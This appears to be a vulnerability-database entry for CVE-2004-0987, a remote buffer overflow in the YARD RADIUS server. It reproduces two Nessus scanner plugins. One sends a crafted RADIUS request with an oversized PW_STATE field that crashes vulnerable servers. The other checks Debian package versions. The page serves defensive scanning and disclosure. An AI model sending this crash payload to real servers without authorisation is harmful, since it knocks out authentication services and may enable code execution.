Vulnerabilities > CVE-2004-0987 - Remote Buffer Overflow vulnerability in Yard Radius
Attack vector
NETWORK Attack complexity
LOW Privileges required
NONE Confidentiality impact
COMPLETE Integrity impact
COMPLETE Availability impact
COMPLETE Summary
Buffer overflow in the process_menu function in yardradius 1.0.20 allows remote attackers to execute arbitrary code.
Vulnerable Configurations
| Part | Description | Count |
|---|---|---|
| Application | 7 | |
| Application | 1 |
Nessus
NASL family Gain a shell remotely NASL id YARDRADIUS_OVERFLOW.NASL description The remote host appears to be running YARD RADIUS 1.0.20 or older. This version is vulnerable to a buffer overflow that allows a remote attacker to execute arbitrary code in the context of the RADIUS server. *** It is likely that this check made the remote RADIUS server crash *** last seen 2020-06-01 modified 2020-06-02 plugin id 15892 published 2004-12-01 reporter This script is Copyright (C) 2004-2018 Tenable Network Security, Inc. source https://www.tenable.com/plugins/nessus/15892 title YardRadius process_menu Function Remote Buffer Overflow code # # (C) Tenable Network Security, Inc. # include("compat.inc"); if (description) { script_id(15892); script_version("1.17"); script_cvs_date("Date: 2018/11/15 20:50:22"); script_cve_id("CVE-2004-0987"); script_bugtraq_id(11753); script_xref(name:"Secunia", value:"13312"); script_name(english:"YardRadius process_menu Function Remote Buffer Overflow"); script_summary(english:"Overflows YARD RADIUS"); script_set_attribute(attribute:"synopsis", value: "The remote host is running a vulnerable RADIUS server that may allow a remote attacker to gain a shell." ); script_set_attribute(attribute:"description", value: "The remote host appears to be running YARD RADIUS 1.0.20 or older. This version is vulnerable to a buffer overflow that allows a remote attacker to execute arbitrary code in the context of the RADIUS server. *** It is likely that this check made the remote RADIUS server crash ***"); script_set_attribute(attribute:"see_also", value:"https://seclists.org/bugtraq/2004/Nov/343"); script_set_attribute(attribute:"solution", value:"Upgrade to the latest version of this software."); script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C"); script_set_cvss_temporal_vector("CVSS2#E:U/RL:OF/RC:C"); script_set_attribute(attribute:"exploitability_ease", value:"No known exploits are available"); script_set_attribute(attribute:"exploit_available", value:"false"); script_set_attribute(attribute:"vuln_publication_date", value:"2004/07/01"); script_set_attribute(attribute:"patch_publication_date", value:"2004/07/01"); script_set_attribute(attribute:"plugin_publication_date", value:"2004/12/01"); script_set_attribute(attribute:"potential_vulnerability", value:"true"); script_set_attribute(attribute:"plugin_type", value:"remote"); script_end_attributes(); script_category(ACT_DESTRUCTIVE_ATTACK); script_copyright(english:"This script is Copyright (C) 2004-2018 Tenable Network Security, Inc."); script_family(english:"Gain a shell remotely"); script_require_keys("Settings/ParanoidReport"); exit(0); } include("audit.inc"); include("global_settings.inc"); if (report_paranoia < 2) audit(AUDIT_PARANOID); port = 1812; if (!get_udp_port_state(port)) audit(AUDIT_PORT_CLOSED, port, "UDP"); soc = open_sock_udp(port); if (!soc) audit(AUDIT_SOCK_FAIL, port, "UDP"); name = "Nessus"; coolreq = raw_string (0x01, # Code: Access Request (1) 0x12, # Packet identifier: 0x12 (18) 0x00,0x1C, # Length: 58 # Authenticator : 0x20,0x20,0x20,0x20,0x20,0x20,0x31,0x31,0x30,0x31,0x39,0x31,0x32,0x38,0x34,0x32, 0x01, # Attribute code : 1 (User-Name) 0x08, # Att length 0x4E,0x65,0x73,0x73,0x75,0x73); send(socket:soc, data:coolreq); r = recv(socket:soc, length:4096); if (!r) exit (0); menu = "MENU=" + crap(data:"A", length:240); req = raw_string (# Authenticator : 0x20,0x20,0x20,0x20,0x20,0x20,0x31,0x31,0x30,0x31,0x39,0x31,0x32,0x38,0x34,0x30, 0x01, # Attribute code : 1 (User-Name) (strlen(name)+2) % 256 # Attibute length ) + name + raw_string (0x18, # Attribute code : PW_STATE (24) (strlen(menu)+2) % 256 # Attribute length ) + menu; len_hi = (strlen(req) + 4)/256; len_lo = (strlen(req) + 4)%256; req = raw_string (0x01, # Code: Access Request (1) 0x12, # Packet identifier: 0x12 (18) len_hi,len_lo) + req; send(socket:soc, data:req); r = recv(socket:soc, length:4096); send(socket:soc, data:coolreq); r = recv(socket:soc, length:4096); if (!r) security_hole(port:port, proto:"udp");NASL family Debian Local Security Checks NASL id DEBIAN_DSA-598.NASL description Max Vozeler noticed that yardradius, the YARD radius authentication and accounting server, contained a stack overflow similar to the one from radiusd which is referenced as CAN-2001-0534. This could lead to the execution of arbitrary code as root. last seen 2020-06-01 modified 2020-06-02 plugin id 15831 published 2004-11-25 reporter This script is Copyright (C) 2004-2019 Tenable Network Security, Inc. source https://www.tenable.com/plugins/nessus/15831 title Debian DSA-598-1 : yardradius - buffer overflow code #%NASL_MIN_LEVEL 80502 # # (C) Tenable Network Security, Inc. # # The descriptive text and package checks in this plugin were # extracted from Debian Security Advisory DSA-598. The text # itself is copyright (C) Software in the Public Interest, Inc. # include("compat.inc"); if (description) { script_id(15831); script_version("1.19"); script_cvs_date("Date: 2019/08/02 13:32:18"); script_cve_id("CVE-2004-0987"); script_xref(name:"DSA", value:"598"); script_name(english:"Debian DSA-598-1 : yardradius - buffer overflow"); script_summary(english:"Checks dpkg output for the updated package"); script_set_attribute( attribute:"synopsis", value:"The remote Debian host is missing a security-related update." ); script_set_attribute( attribute:"description", value: "Max Vozeler noticed that yardradius, the YARD radius authentication and accounting server, contained a stack overflow similar to the one from radiusd which is referenced as CAN-2001-0534. This could lead to the execution of arbitrary code as root." ); script_set_attribute( attribute:"see_also", value:"http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=278384" ); script_set_attribute( attribute:"see_also", value:"http://www.debian.org/security/2004/dsa-598" ); script_set_attribute( attribute:"solution", value: "Upgrade the yardradius package immediately. For the stable distribution (woody) this problem has been fixed in version 1.0.20-2woody1." ); script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C"); script_set_attribute(attribute:"plugin_type", value:"local"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:debian:debian_linux:yardradius"); script_set_attribute(attribute:"cpe", value:"cpe:/o:debian:debian_linux:3.0"); script_set_attribute(attribute:"patch_publication_date", value:"2004/11/25"); script_set_attribute(attribute:"plugin_publication_date", value:"2004/11/25"); script_set_attribute(attribute:"vuln_publication_date", value:"2004/07/01"); script_end_attributes(); script_category(ACT_GATHER_INFO); script_copyright(english:"This script is Copyright (C) 2004-2019 Tenable Network Security, Inc."); script_family(english:"Debian Local Security Checks"); script_dependencies("ssh_get_info.nasl"); script_require_keys("Host/local_checks_enabled", "Host/Debian/release", "Host/Debian/dpkg-l"); exit(0); } include("audit.inc"); include("debian_package.inc"); if (!get_kb_item("Host/local_checks_enabled")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED); if (!get_kb_item("Host/Debian/release")) audit(AUDIT_OS_NOT, "Debian"); if (!get_kb_item("Host/Debian/dpkg-l")) audit(AUDIT_PACKAGE_LIST_MISSING); flag = 0; if (deb_check(release:"3.0", prefix:"yardradius", reference:"1.0.20-2woody1")) flag++; if (flag) { if (report_verbosity > 0) security_hole(port:0, extra:deb_report_get()); else security_hole(0); exit(0); } else audit(AUDIT_HOST_NOT, "affected");